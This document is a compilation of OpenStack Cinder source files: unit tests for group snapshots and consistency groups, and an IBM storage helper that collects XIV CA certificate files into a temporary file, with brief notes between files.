version=GROUP_MICRO_VERSION)
res_dict = self.controller.delete(req, group_snapshot.id)
group_snapshot = objects.GroupSnapshot.get_by_id(self.context,
group_snapshot.id)
self.assertEqual(202, res_dict.status_int)
self.assertEqual('deleting', group_snapshot.status)
group_snapshot.destroy()
db.volume_destroy(context.get_admin_context(),
volume_id)
group.destroy()
def test_delete_group_snapshot_available_used_as_source(self):
group = utils.create_group(
self.context,
group_type_id=fake.GROUP_TYPE_ID,
volume_type_ids=[fake.VOLUME_TYPE_ID],)
volume_id = utils.create_volume(
self.context,
group_id=group.id,
volume_type_id=fake.VOLUME_TYPE_ID)['id']
group_snapshot = utils.create_group_snapshot(
self.context,
group_id=group.id,
status='available')
group2 = utils.create_group(
self.context, status='creating',
group_snapshot_id=group_snapshot.id,
group_type_id=fake.GROUP_TYPE_ID,
volume_type_ids=[fake.VOLUME_TYPE_ID],)
req = fakes.HTTPRequest.blank('/v3/%s/group_snapshots/%s' %
(fake.PROJECT_ID, group_snapshot.id),
version=GROUP_MICRO_VERSION)
self.assertRaises(webob.exc.HTTPBadRequest, self.controller.delete,
req, group_snapshot.id)
group_snapshot.destroy()
db.volume_destroy(context.get_admin_context(),
volume_id)
group.destroy()
group2.destroy()
def test_delete_group_snapshot_with_group_snapshot_NotFound(self):
req = fakes.HTTPRequest.blank('/v3/%s/group_snapshots/%s' %
(fake.PROJECT_ID,
fake.WILL_NOT_BE_FOUND_ID),
version=GROUP_MICRO_VERSION)
self.assertRaises(exception.GroupSnapshotNotFound,
self.controller.delete,
req, fake.WILL_NOT_BE_FOUND_ID)
def test_delete_group_snapshot_with_invalid_group_snapshot(self):
group = utils.create_group(
self.context,
group_type_id=fake.GROUP_TYPE_ID,
volume_type_ids=[fake.VOLUME_TYPE_ID],)
volume_id = utils.create_volume(
self.context,
group_id=group.id,
volume_type_id=fake.VOLUME_TYPE_ID)['id']
group_snapshot = utils.create_group_snapshot(
self.context,
group_id=group.id,
status='invalid')
req = fakes.HTTPRequest.blank('/v3/%s/group_snapshots/%s' %
(fake.PROJECT_ID, group_snapshot.id),
version=GROUP_MICRO_VERSION)
self.assertRaises(webob.exc.HTTPBadRequest, self.controller.delete,
req, group_snapshot.id)
group_snapshot.destroy()
db.volume_destroy(context.get_admin_context(),
volume_id)
group.destroy()
@ddt.data(('3.11', 'fake_snapshot_001',
fields.GroupSnapshotStatus.AVAILABLE,
exception.VersionNotFoundForAPIMethod),
('3.18', 'fake_snapshot_001',
fields.GroupSnapshotStatus.AVAILABLE,
exception.VersionNotFoundForAPIMethod),
('3.19', 'fake_snapshot_001',
fields.GroupSnapshotStatus.AVAILABLE,
exception.GroupSnapshotNotFound))
@ddt.unpack
def test_reset_group_snapshot_status_illegal(self, version,
group_snapshot_id,
status, exceptions):
req = fakes.HTTPRequest.blank('/v3/%s/group_snapshots/%s/action' %
(fake.PROJECT_ID, group_snapshot_id),
version=version)
body = {"reset_status": {
"status": status
}}
self.assertRaises(exceptions,
self.controller.reset_status,
req, group_snapshot_id, body)
def test_reset_group_snapshot_status_invalid_status(self):
group = utils.create_group(
self.context,
group_type_id=fake.GROUP_TYPE_ID,
volume_type_ids=[fake.VOLUME_TYPE_ID])
group_snapshot = utils.create_group_snapshot(
self.context,
group_id=group.id,
status=fields.GroupSnapshotStatus.CREATING)
req = fakes.HTTPRequest.blank('/v3/%s/group_snapshots/%s/action' %
(fake.PROJECT_ID, group_snapshot.id),
version='3.19')
body = {"reset_status": {
"status": "invalid_test_status"
}}
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller.reset_status,
req, group_snapshot.id, body)
def test_reset_group_snapshot_status(self):
group = utils.create_group(
self.context,
group_type_id=fake.GROUP_TYPE_ID,
volume_type_ids=[fake.VOLUME_TYPE_ID])
group_snapshot = utils.create_group_snapshot(
self.context,
group_id=group.id,
status=fields.GroupSnapshotStatus.CREATING)
req = fakes.HTTPRequest.blank('/v3/%s/group_snapshots/%s/action' %
(fake.PROJECT_ID, group_snapshot.id),
version='3.19')
body = {"reset_status": {
"status": fields.GroupSnapshotStatus.AVAILABLE
}}
response = self.controller.reset_status(req, group_snapshot.id,
body)
g_snapshot = objects.GroupSnapshot.get_by_id(self.context,
group_snapshot.id)
self.assertEqual(202, response.status_int)
self.assertEqual(fields.GroupSnapshotStatus.AVAILABLE,
g_snapshot.status)
```
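The versioned request construction above is repeated in every test; a minimal sketch of how it could be factored into a helper, assuming the `fakes` and `GROUP_MICRO_VERSION` names from the test module (the helper name and placement are illustrative, not part of the original file):
```python
def _group_snapshot_req(project_id, suffix='', version=GROUP_MICRO_VERSION):
    """Build a versioned /v3 group_snapshots request (illustrative helper)."""
    url = '/v3/%s/group_snapshots%s' % (project_id, suffix)
    return fakes.HTTPRequest.blank(url, version=version)

# Example: _group_snapshot_req(fake.PROJECT_ID, '/detail') replaces the
# multi-line fakes.HTTPRequest.blank(...) call used throughout the tests above.
```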
#### File: unit/consistencygroup/test_cg.py
```python
import ddt
import mock
from oslo_config import cfg
import cinder.consistencygroup
from cinder import context
from cinder import db
from cinder import exception
from cinder import objects
from cinder.objects import fields
from cinder import quota
from cinder.tests.unit import conf_fixture
from cinder.tests.unit import fake_constants as fake
from cinder.tests.unit import fake_snapshot
from cinder.tests.unit import fake_volume
from cinder.tests.unit import utils as tests_utils
from cinder.tests.unit import volume as base
import cinder.volume
from cinder.volume import driver
from cinder.volume import utils as volutils
CGQUOTAS = quota.CGQUOTAS
CONF = cfg.CONF
@ddt.ddt
class ConsistencyGroupTestCase(base.BaseVolumeTestCase):
def test_delete_volume_in_consistency_group(self):
"""Test deleting a volume that's tied to a consistency group fails."""
consistencygroup_id = fake.CONSISTENCY_GROUP_ID
volume_api = cinder.volume.api.API()
self.volume_params.update({'status': 'available',
'consistencygroup_id': consistencygroup_id})
volume = tests_utils.create_volume(self.context, **self.volume_params)
self.assertRaises(exception.InvalidVolume,
volume_api.delete, self.context, volume)
@mock.patch.object(CGQUOTAS, "reserve",
return_value=["RESERVATION"])
@mock.patch.object(CGQUOTAS, "commit")
@mock.patch.object(CGQUOTAS, "rollback")
@mock.patch.object(driver.VolumeDriver,
"delete_consistencygroup",
return_value=({'status': (
fields.ConsistencyGroupStatus.DELETED)}, []))
def test_create_delete_consistencygroup(self, fake_delete_cg,
fake_rollback,
fake_commit, fake_reserve):
"""Test consistencygroup can be created and deleted."""
def fake_driver_create_cg(context, group):
"""Make sure that the pool is part of the host."""
self.assertIn('host', group)
host = group.host
pool = volutils.extract_host(host, level='pool')
self.assertEqual('fakepool', pool)
return {'status': 'available'}
self.mock_object(self.volume.driver, 'create_consistencygroup',
fake_driver_create_cg)
group = tests_utils.create_consistencygroup(
self.context,
availability_zone=CONF.storage_availability_zone,
volume_type='type1,type2',
host='fakehost@fakedrv#fakepool')
group = objects.ConsistencyGroup.get_by_id(self.context, group.id)
self.assertEqual(0, len(self.notifier.notifications),
self.notifier.notifications)
self.volume.create_consistencygroup(self.context, group)
self.assertEqual(2, len(self.notifier.notifications),
self.notifier.notifications)
msg = self.notifier.notifications[0]
self.assertEqual('consistencygroup.create.start', msg['event_type'])
expected = {
'status': fields.ConsistencyGroupStatus.AVAILABLE,
'name': 'test_cg',
'availability_zone': 'nova',
'tenant_id': self.context.project_id,
'created_at': mock.ANY,
'user_id': fake.USER_ID,
'consistencygroup_id': group.id
}
self.assertDictEqual(expected, msg['payload'])
msg = self.notifier.notifications[1]
self.assertEqual('consistencygroup.create.end', msg['event_type'])
self.assertDictEqual(expected, msg['payload'])
self.assertEqual(
group.id,
objects.ConsistencyGroup.get_by_id(context.get_admin_context(),
group.id).id)
self.volume.delete_consistencygroup(self.context, group)
cg = objects.ConsistencyGroup.get_by_id(
context.get_admin_context(read_deleted='yes'), group.id)
self.assertEqual(fields.ConsistencyGroupStatus.DELETED, cg.status)
self.assertEqual(4, len(self.notifier.notifications),
self.notifier.notifications)
msg = self.notifier.notifications[2]
self.assertEqual('consistencygroup.delete.start', msg['event_type'])
self.assertDictEqual(expected, msg['payload'])
msg = self.notifier.notifications[3]
self.assertEqual('consistencygroup.delete.end', msg['event_type'])
expected['status'] = fields.ConsistencyGroupStatus.DELETED
self.assertDictEqual(expected, msg['payload'])
self.assertRaises(exception.NotFound,
objects.ConsistencyGroup.get_by_id,
self.context,
group.id)
@mock.patch.object(CGQUOTAS, "reserve",
return_value=["RESERVATION"])
@mock.patch.object(CGQUOTAS, "commit")
@mock.patch.object(CGQUOTAS, "rollback")
@mock.patch.object(driver.VolumeDriver,
"create_consistencygroup",
return_value={'status': 'available'})
@mock.patch.object(driver.VolumeDriver,
"update_consistencygroup")
def test_update_consistencygroup(self, fake_update_cg,
fake_create_cg, fake_rollback,
fake_commit, fake_reserve):
"""Test consistencygroup can be updated."""
group = tests_utils.create_consistencygroup(
self.context,
availability_zone=CONF.storage_availability_zone,
volume_type='type1,type2')
self.volume.create_consistencygroup(self.context, group)
volume = tests_utils.create_volume(
self.context,
consistencygroup_id=group.id,
**self.volume_params)
self.volume.create_volume(self.context, volume)
volume2 = tests_utils.create_volume(
self.context,
consistencygroup_id=None,
**self.volume_params)
self.volume.create_volume(self.context, volume2)
fake_update_cg.return_value = (
{'status': fields.ConsistencyGroupStatus.AVAILABLE},
[{'id': volume2.id, 'status': 'available'}],
[{'id': volume.id, 'status': 'available'}])
self.volume.update_consistencygroup(self.context, group,
add_volumes=volume2.id,
remove_volumes=volume.id)
cg = objects.ConsistencyGroup.get_by_id(self.context, group.id)
expected = {
'status': fields.ConsistencyGroupStatus.AVAILABLE,
'name': 'test_cg',
'availability_zone': 'nova',
'tenant_id': self.context.project_id,
'created_at': mock.ANY,
'user_id': fake.USER_ID,
'consistencygroup_id': group.id
}
self.assertEqual(fields.ConsistencyGroupStatus.AVAILABLE, cg.status)
self.assertEqual(10, len(self.notifier.notifications),
self.notifier.notifications)
msg = self.notifier.notifications[6]
self.assertEqual('consistencygroup.update.start', msg['event_type'])
self.assertDictEqual(expected, msg['payload'])
msg = self.notifier.notifications[8]
self.assertEqual('consistencygroup.update.end', msg['event_type'])
self.assertDictEqual(expected, msg['payload'])
cgvolumes = db.volume_get_all_by_group(self.context, group.id)
cgvol_ids = [cgvol['id'] for cgvol in cgvolumes]
# Verify volume is removed.
self.assertNotIn(volume.id, cgvol_ids)
# Verify volume is added.
self.assertIn(volume2.id, cgvol_ids)
self.volume_params['status'] = 'wrong-status'
volume3 = tests_utils.create_volume(
self.context,
consistencygroup_id=None,
**self.volume_params)
volume_id3 = volume3['id']
volume_get_orig = self.volume.db.volume_get
self.volume.db.volume_get = mock.Mock(
return_value={'status': 'wrong_status',
'id': volume_id3})
# Try to add a volume in wrong status
self.assertRaises(exception.InvalidVolume,
self.volume.update_consistencygroup,
self.context,
group,
add_volumes=volume_id3,
remove_volumes=None)
self.volume.db.volume_get.reset_mock()
self.volume.db.volume_get = volume_get_orig
def test_update_consistencygroup_volume_not_found(self):
group = tests_utils.create_consistencygroup(
self.context,
availability_zone=CONF.storage_availability_zone,
volume_type='type1,type2')
self.assertRaises(exception.VolumeNotFound,
self.volume.update_consistencygroup,
self.context,
group,
fake.VOLUME_ID)
self.assertRaises(exception.VolumeNotFound,
self.volume.update_consistencygroup,
self.context,
group,
None,
fake.VOLUME_ID)
@mock.patch.object(driver.VolumeDriver,
"create_consistencygroup",
return_value={'status': 'available'})
@mock.patch.object(driver.VolumeDriver,
"delete_consistencygroup",
return_value=({'status': 'deleted'}, []))
@mock.patch.object(driver.VolumeDriver,
"create_cgsnapshot",
return_value={'status': 'available'})
@mock.patch.object(driver.VolumeDriver,
"delete_cgsnapshot",
return_value=({'status': 'deleted'}, []))
@mock.patch.object(driver.VolumeDriver,
"create_consistencygroup_from_src",
return_value=(None, None))
@mock.patch('cinder.volume.drivers.lvm.LVMVolumeDriver.'
'create_volume_from_snapshot')
@mock.patch('cinder.volume.drivers.lvm.LVMVolumeDriver.'
'create_cloned_volume')
def test_create_consistencygroup_from_src(self,
mock_create_cloned_vol,
mock_create_vol_from_snap,
mock_create_from_src,
mock_delete_cgsnap,
mock_create_cgsnap,
mock_delete_cg,
mock_create_cg):
"""Test consistencygroup can be created and deleted."""
group = tests_utils.create_consistencygroup(
self.context,
availability_zone=CONF.storage_availability_zone,
volume_type='type1,type2',
status=fields.ConsistencyGroupStatus.AVAILABLE)
volume = tests_utils.create_volume(
self.context,
consistencygroup_id=group.id,
status='available',
host=CONF.host,
size=1)
volume_id = volume['id']
cgsnapshot_returns = self._create_cgsnapshot(group.id, [volume_id])
cgsnapshot = cgsnapshot_returns[0]
snapshot_id = cgsnapshot_returns[1][0]['id']
# Create CG from source CG snapshot.
group2 = tests_utils.create_consistencygroup(
self.context,
availability_zone=CONF.storage_availability_zone,
volume_type='type1,type2',
cgsnapshot_id=cgsnapshot.id)
group2 = objects.ConsistencyGroup.get_by_id(self.context, group2.id)
volume2 = tests_utils.create_volume(
self.context,
consistencygroup_id=group2.id,
snapshot_id=snapshot_id,
**self.volume_params)
self.volume.create_volume(self.context, volume2)
self.volume.create_consistencygroup_from_src(
self.context, group2, cgsnapshot=cgsnapshot)
cg2 = objects.ConsistencyGroup.get_by_id(self.context, group2.id)
expected = {
'status': fields.ConsistencyGroupStatus.AVAILABLE,
'name': 'test_cg',
'availability_zone': 'nova',
'tenant_id': self.context.project_id,
'created_at': mock.ANY,
'user_id': fake.USER_ID,
'consistencygroup_id': group2.id,
}
self.assertEqual(fields.ConsistencyGroupStatus.AVAILABLE, cg2.status)
self.assertEqual(group2.id, cg2['id'])
self.assertEqual(cgsnapshot.id, cg2['cgsnapshot_id'])
self.assertIsNone(cg2['source_cgid'])
msg = self.notifier.notifications[2]
self.assertEqual('consistencygroup.create.start', msg['event_type'])
self.assertDictEqual(expected, msg['payload'])
msg = self.notifier.notifications[4]
self.assertEqual('consistencygroup.create.end', msg['event_type'])
self.assertDictEqual(expected, msg['payload'])
if len(self.notifier.notifications) > 6:
self.assertFalse(self.notifier.notifications[6],
self.notifier.notifications)
self.assertEqual(6, len(self.notifier.notifications),
self.notifier.notifications)
self.volume.delete_consistencygroup(self.context, group2)
if len(self.notifier.notifications) > 10:
self.assertFalse(self.notifier.notifications[10],
self.notifier.notifications)
self.assertEqual(10, len(self.notifier.notifications),
self.notifier.notifications)
msg = self.notifier.notifications[6]
self.assertEqual('consistencygroup.delete.start', msg['event_type'])
expected['status'] = fields.ConsistencyGroupStatus.AVAILABLE
self.assertDictEqual(expected, msg['payload'])
msg = self.notifier.notifications[8]
self.assertEqual('consistencygroup.delete.end', msg['event_type'])
expected['status'] = fields.ConsistencyGroupStatus.DELETED
self.assertDictEqual(expected, msg['payload'])
cg2 = objects.ConsistencyGroup.get_by_id(
context.get_admin_context(read_deleted='yes'), group2.id)
self.assertEqual(fields.ConsistencyGroupStatus.DELETED, cg2.status)
self.assertRaises(exception.NotFound,
objects.ConsistencyGroup.get_by_id,
self.context,
group2.id)
# Create CG from source CG.
group3 = tests_utils.create_consistencygroup(
self.context,
availability_zone=CONF.storage_availability_zone,
volume_type='type1,type2',
source_cgid=group.id)
volume3 = tests_utils.create_volume(
self.context,
consistencygroup_id=group3.id,
source_volid=volume_id,
**self.volume_params)
self.volume.create_volume(self.context, volume3)
self.volume.create_consistencygroup_from_src(
self.context, group3, source_cg=group)
cg3 = objects.ConsistencyGroup.get_by_id(self.context, group3.id)
self.assertEqual(fields.ConsistencyGroupStatus.AVAILABLE, cg3.status)
self.assertEqual(group3.id, cg3.id)
self.assertEqual(group.id, cg3.source_cgid)
self.assertIsNone(cg3.cgsnapshot_id)
self.volume.delete_cgsnapshot(self.context, cgsnapshot)
self.volume.delete_consistencygroup(self.context, group)
def test_create_consistencygroup_from_src_frozen(self):
service = tests_utils.create_service(self.context, {'frozen': True})
cg = tests_utils.create_consistencygroup(self.context,
host=service.host)
cg_api = cinder.consistencygroup.api.API()
self.assertRaises(exception.InvalidInput,
cg_api.create_from_src,
self.context, 'cg', 'desc', cgsnapshot_id=None,
source_cgid=cg.id)
def test_delete_consistencygroup_frozen(self):
service = tests_utils.create_service(self.context, {'frozen': True})
cg = tests_utils.create_consistencygroup(self.context,
host=service.host)
cg_api = cinder.consistencygroup.api.API()
self.assertRaises(exception.InvalidInput,
cg_api.delete, self.context, cg)
def test_create_cgsnapshot_frozen(self):
service = tests_utils.create_service(self.context, {'frozen': True})
cg = tests_utils.create_consistencygroup(self.context,
host=service.host)
cg_api = cinder.consistencygroup.api.API()
self.assertRaises(exception.InvalidInput,
cg_api.create_cgsnapshot,
self.context, cg, 'cg', 'desc')
def test_delete_cgsnapshot_frozen(self):
service = tests_utils.create_service(self.context, {'frozen': True})
cg = tests_utils.create_consistencygroup(self.context,
host=service.host)
cgsnap = tests_utils.create_cgsnapshot(self.context, cg.id)
cg_api = cinder.consistencygroup.api.API()
self.assertRaises(exception.InvalidInput,
cg_api.delete_cgsnapshot,
self.context, cgsnap)
def test_sort_snapshots(self):
vol1 = {'id': fake.VOLUME_ID, 'name': 'volume 1',
'snapshot_id': fake.SNAPSHOT_ID,
'consistencygroup_id': fake.CONSISTENCY_GROUP_ID}
vol2 = {'id': fake.VOLUME2_ID, 'name': 'volume 2',
'snapshot_id': fake.SNAPSHOT2_ID,
'consistencygroup_id': fake.CONSISTENCY_GROUP_ID}
vol3 = {'id': fake.VOLUME3_ID, 'name': 'volume 3',
'snapshot_id': fake.SNAPSHOT3_ID,
'consistencygroup_id': fake.CONSISTENCY_GROUP_ID}
snp1 = {'id': fake.SNAPSHOT_ID, 'name': 'snap 1',
'cgsnapshot_id': fake.CONSISTENCY_GROUP_ID}
snp2 = {'id': fake.SNAPSHOT2_ID, 'name': 'snap 2',
'cgsnapshot_id': fake.CONSISTENCY_GROUP_ID}
snp3 = {'id': fake.SNAPSHOT3_ID, 'name': 'snap 3',
'cgsnapshot_id': fake.CONSISTENCY_GROUP_ID}
snp1_obj = fake_snapshot.fake_snapshot_obj(self.context, **snp1)
snp2_obj = fake_snapshot.fake_snapshot_obj(self.context, **snp2)
snp3_obj = fake_snapshot.fake_snapshot_obj(self.context, **snp3)
volumes = []
snapshots = []
volumes.append(vol1)
volumes.append(vol2)
volumes.append(vol3)
snapshots.append(snp2_obj)
snapshots.append(snp3_obj)
snapshots.append(snp1_obj)
i = 0
for vol in volumes:
snap = snapshots[i]
i += 1
self.assertNotEqual(vol['snapshot_id'], snap.id)
sorted_snaps = self.volume._sort_snapshots(volumes, snapshots)
i = 0
for vol in volumes:
snap = sorted_snaps[i]
i += 1
self.assertEqual(vol['snapshot_id'], snap.id)
snapshots[2]['id'] = fake.WILL_NOT_BE_FOUND_ID
self.assertRaises(exception.SnapshotNotFound,
self.volume._sort_snapshots,
volumes, snapshots)
self.assertRaises(exception.InvalidInput,
self.volume._sort_snapshots,
volumes, [])
def test_sort_source_vols(self):
vol1 = {'id': '1', 'name': 'volume 1',
'source_volid': '1',
'consistencygroup_id': '2'}
vol2 = {'id': '2', 'name': 'volume 2',
'source_volid': '2',
'consistencygroup_id': '2'}
vol3 = {'id': '3', 'name': 'volume 3',
'source_volid': '3',
'consistencygroup_id': '2'}
src_vol1 = {'id': '1', 'name': 'source vol 1',
'consistencygroup_id': '1'}
src_vol2 = {'id': '2', 'name': 'source vol 2',
'consistencygroup_id': '1'}
src_vol3 = {'id': '3', 'name': 'source vol 3',
'consistencygroup_id': '1'}
volumes = []
src_vols = []
volumes.append(vol1)
volumes.append(vol2)
volumes.append(vol3)
src_vols.append(src_vol2)
src_vols.append(src_vol3)
src_vols.append(src_vol1)
i = 0
for vol in volumes:
src_vol = src_vols[i]
i += 1
self.assertNotEqual(vol['source_volid'], src_vol['id'])
sorted_src_vols = self.volume._sort_source_vols(volumes, src_vols)
i = 0
for vol in volumes:
src_vol = sorted_src_vols[i]
i += 1
self.assertEqual(vol['source_volid'], src_vol['id'])
src_vols[2]['id'] = '9999'
self.assertRaises(exception.VolumeNotFound,
self.volume._sort_source_vols,
volumes, src_vols)
self.assertRaises(exception.InvalidInput,
self.volume._sort_source_vols,
volumes, [])
def _create_cgsnapshot(self, group_id, volume_ids, size='0'):
"""Create a cgsnapshot object."""
cgsnap = objects.CGSnapshot(self.context)
cgsnap.user_id = fake.USER_ID
cgsnap.project_id = fake.PROJECT_ID
cgsnap.consistencygroup_id = group_id
cgsnap.status = "creating"
cgsnap.create()
# Create the snapshot list (initialized once, outside the loop).
snaps = []
for volume_id in volume_ids:
snap = objects.Snapshot(context.get_admin_context())
snap.volume_size = size
snap.user_id = fake.USER_ID
snap.project_id = fake.PROJECT_ID
snap.volume_id = volume_id
snap.status = "available"
snap.cgsnapshot_id = cgsnap.id
snap.create()
snaps.append(snap)
return cgsnap, snaps
@ddt.data((CONF.host, None), (CONF.host + 'fake', 'mycluster'))
@ddt.unpack
@mock.patch('cinder.tests.unit.fake_notifier.FakeNotifier._notify')
@mock.patch('cinder.volume.driver.VolumeDriver.create_consistencygroup',
autospec=True,
return_value={'status': 'available'})
@mock.patch('cinder.volume.driver.VolumeDriver.delete_consistencygroup',
autospec=True,
return_value=({'status': 'deleted'}, []))
@mock.patch('cinder.volume.driver.VolumeDriver.create_cgsnapshot',
autospec=True,
return_value=({'status': 'available'}, []))
@mock.patch('cinder.volume.driver.VolumeDriver.delete_cgsnapshot',
autospec=True,
return_value=({'status': 'deleted'}, []))
def test_create_delete_cgsnapshot(self, host, cluster,
mock_del_cgsnap, mock_create_cgsnap,
mock_del_cg, _mock_create_cg,
mock_notify):
"""Test cgsnapshot can be created and deleted."""
self.volume.cluster = cluster
group = tests_utils.create_consistencygroup(
self.context,
host=host,
cluster_name=cluster,
availability_zone=CONF.storage_availability_zone,
volume_type='type1,type2')
self.volume_params['host'] = host
volume = tests_utils.create_volume(
self.context,
cluster_name=cluster,
consistencygroup_id=group.id,
**self.volume_params)
self.volume.create_volume(self.context, volume)
self.assert_notify_called(mock_notify,
(['INFO', 'volume.create.start'],
['INFO', 'volume.create.end']))
cgsnapshot_returns = self._create_cgsnapshot(group.id, [volume.id])
cgsnapshot = cgsnapshot_returns[0]
self.volume.create_cgsnapshot(self.context, cgsnapshot)
self.assertEqual(cgsnapshot.id,
objects.CGSnapshot.get_by_id(
context.get_admin_context(),
cgsnapshot.id).id)
self.assert_notify_called(mock_notify,
(['INFO', 'volume.create.start'],
['INFO', 'volume.create.end'],
['INFO', 'cgsnapshot.create.start'],
['INFO', 'snapshot.create.start'],
['INFO', 'cgsnapshot.create.end'],
['INFO', 'snapshot.create.end']))
self.volume.delete_cgsnapshot(self.context, cgsnapshot)
self.assert_notify_called(mock_notify,
(['INFO', 'volume.create.start'],
['INFO', 'volume.create.end'],
['INFO', 'cgsnapshot.create.start'],
['INFO', 'snapshot.create.start'],
['INFO', 'cgsnapshot.create.end'],
['INFO', 'snapshot.create.end'],
['INFO', 'cgsnapshot.delete.start'],
['INFO', 'snapshot.delete.start'],
['INFO', 'cgsnapshot.delete.end'],
['INFO', 'snapshot.delete.end']))
cgsnap = objects.CGSnapshot.get_by_id(
context.get_admin_context(read_deleted='yes'),
cgsnapshot.id)
self.assertEqual('deleted', cgsnap.status)
self.assertRaises(exception.NotFound,
objects.CGSnapshot.get_by_id,
self.context,
cgsnapshot.id)
self.volume.delete_consistencygroup(self.context, group)
self.assertTrue(mock_create_cgsnap.called)
self.assertTrue(mock_del_cgsnap.called)
self.assertTrue(mock_del_cg.called)
@mock.patch('cinder.volume.driver.VolumeDriver.create_consistencygroup',
return_value={'status': 'available'})
@mock.patch('cinder.volume.driver.VolumeDriver.delete_consistencygroup',
return_value=({'status': 'deleted'}, []))
def test_delete_consistencygroup_correct_host(self,
mock_del_cg,
_mock_create_cg):
"""Test consistencygroup can be deleted.
Test consistencygroup can be deleted when volumes are on
the correct volume node.
"""
group = tests_utils.create_consistencygroup(
self.context,
availability_zone=CONF.storage_availability_zone,
volume_type='type1,type2')
volume = tests_utils.create_volume(
self.context,
consistencygroup_id=group.id,
host='host1@backend1#pool1',
status='creating',
size=1)
self.volume.host = 'host1@backend1'
self.volume.create_volume(self.context, volume)
self.volume.delete_consistencygroup(self.context, group)
cg = objects.ConsistencyGroup.get_by_id(
context.get_admin_context(read_deleted='yes'),
group.id)
self.assertEqual(fields.ConsistencyGroupStatus.DELETED, cg.status)
self.assertRaises(exception.NotFound,
objects.ConsistencyGroup.get_by_id,
self.context,
group.id)
self.assertTrue(mock_del_cg.called)
@mock.patch('cinder.volume.driver.VolumeDriver.create_consistencygroup',
mock.Mock(return_value={'status': 'available'}))
@mock.patch('cinder.volume.driver.VolumeDriver.delete_consistencygroup',
return_value=({'status': 'deleted'}, []))
def test_delete_consistencygroup_cluster(self, mock_del_cg):
"""Test consistencygroup can be deleted.
Test consistencygroup can be deleted when its volumes are on
a volume node that belongs to the same cluster.
"""
cluster_name = 'cluster@backend1'
self.volume.host = 'host2@backend1'
self.volume.cluster = cluster_name
group = tests_utils.create_consistencygroup(
self.context,
host=CONF.host + 'fake',
cluster_name=cluster_name,
availability_zone=CONF.storage_availability_zone,
volume_type='type1,type2')
volume = tests_utils.create_volume(
self.context,
consistencygroup_id=group.id,
host='host1@backend1#pool1',
cluster_name=cluster_name,
status='creating',
size=1)
self.volume.create_volume(self.context, volume)
self.volume.delete_consistencygroup(self.context, group)
cg = objects.ConsistencyGroup.get_by_id(
context.get_admin_context(read_deleted='yes'),
group.id)
self.assertEqual(fields.ConsistencyGroupStatus.DELETED, cg.status)
self.assertRaises(exception.NotFound,
objects.ConsistencyGroup.get_by_id,
self.context,
group.id)
self.assertTrue(mock_del_cg.called)
@mock.patch('cinder.volume.driver.VolumeDriver.create_consistencygroup',
return_value={'status': 'available'})
def test_delete_consistencygroup_wrong_host(self, *_mock_create_cg):
"""Test consistencygroup cannot be deleted.
Test consistencygroup cannot be deleted when volumes in the
group are not local to the volume node.
"""
group = tests_utils.create_consistencygroup(
self.context,
availability_zone=CONF.storage_availability_zone,
volume_type='type1,type2')
volume = tests_utils.create_volume(
self.context,
consistencygroup_id=group.id,
host='host1@backend1#pool1',
status='creating',
size=1)
self.volume.host = 'host1@backend2'
self.volume.create_volume(self.context, volume)
self.assertRaises(exception.Invalid,
self.volume.delete_consistencygroup,
self.context,
group)
cg = objects.ConsistencyGroup.get_by_id(self.context, group.id)
# Group is not deleted
self.assertEqual(fields.ConsistencyGroupStatus.AVAILABLE, cg.status)
def test_create_volume_with_consistencygroup_invalid_type(self):
"""Test volume creation with ConsistencyGroup & invalid volume type."""
vol_type = db.volume_type_create(
context.get_admin_context(),
dict(name=conf_fixture.def_vol_type, extra_specs={})
)
vol_type = objects.VolumeType.get_by_id(self.context,
vol_type.id)
cg = objects.ConsistencyGroup(self.context,
id=fake.CONSISTENCY_GROUP_ID,
name='cg1',
volume_type_id=vol_type.id)
fake_type = fake_volume.fake_volume_type_obj(
self.context,
id=fake.VOLUME_TYPE_ID,
name='fake')
vol_api = cinder.volume.api.API()
# Volume type must be provided when creating a volume in a
# consistency group.
self.assertRaises(exception.InvalidInput,
vol_api.create,
self.context, 1, 'vol1', 'volume 1',
consistencygroup=cg)
# Volume type must be valid.
self.assertRaises(exception.InvalidInput,
vol_api.create,
self.context, 1, 'vol1', 'volume 1',
volume_type=fake_type,
consistencygroup=cg)
@mock.patch('cinder.volume.driver.VolumeDriver.create_cgsnapshot',
autospec=True,
return_value=({'status': 'available'}, []))
def test_create_cgsnapshot_with_bootable_volumes(self, mock_create_cgsnap):
"""Test cgsnapshot can be created and deleted."""
group = tests_utils.create_consistencygroup(
self.context,
availability_zone=CONF.storage_availability_zone,
volume_type='type1,type2')
volume = tests_utils.create_volume(
self.context,
consistencygroup_id=group.id,
**self.volume_params)
self.volume.create_volume(self.context, volume)
# Create a bootable volume
bootable_vol_params = {'status': 'creating', 'host': CONF.host,
'size': 1, 'bootable': True}
bootable_vol = tests_utils.create_volume(self.context,
consistencygroup_id=group.id,
**bootable_vol_params)
# Create the bootable volume on the backend
self.volume.create_volume(self.context, bootable_vol)
volume_ids = [volume.id, bootable_vol.id]
cgsnapshot_returns = self._create_cgsnapshot(group.id, volume_ids)
cgsnapshot = cgsnapshot_returns[0]
self.volume.create_cgsnapshot(self.context, cgsnapshot)
self.assertEqual(cgsnapshot.id,
objects.CGSnapshot.get_by_id(
context.get_admin_context(),
cgsnapshot.id).id)
self.assertTrue(mock_create_cgsnap.called)
```
#### File: ibm/ibm_storage/certificate.py
```python
import os
import tempfile
from oslo_log import log as logging
from cinder.i18n import _LE
LOG = logging.getLogger(__name__)
class CertificateCollector(object):
def __init__(self, paths=None):
self.paths_checked = [
'/etc/ssl/certs', '/etc/ssl/certs/xiv', '/etc/pki', '/etc/pki/xiv']
if paths:
self.paths_checked.extend(paths)
self.paths_checked = set(self.paths_checked)
self.tmp_fd = None
self.tmp_path = None
def collect_certificate(self):
self.tmp_fd, self.tmp_path = tempfile.mkstemp()
for path in self.paths_checked:
if os.path.exists(path) and os.path.isdir(path):
dir_contents = os.listdir(path)
for f in dir_contents:
full_path = os.path.join(path, f)
if (os.path.isfile(full_path) and
f.startswith('XIV') and
f.endswith('.pem')):
try:
# Read as bytes so os.write() accepts the data on Python 3 as well.
cert_file = open(full_path, 'rb')
os.write(self.tmp_fd, cert_file.read())
cert_file.close()
except Exception:
LOG.exception(_LE("Failed to process certificate"))
os.close(self.tmp_fd)
fsize = os.path.getsize(self.tmp_path)
if fsize > 0:
return self.tmp_path
else:
return None
def free_certificate(self):
if self.tmp_path:
try:
os.remove(self.tmp_path)
except Exception:
pass
self.tmp_path = None
```
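A minimal usage sketch for the collector above, assuming XIV `*.pem` files exist under one of the checked directories; the extra path and the HTTPS client call are illustrative only:
```python
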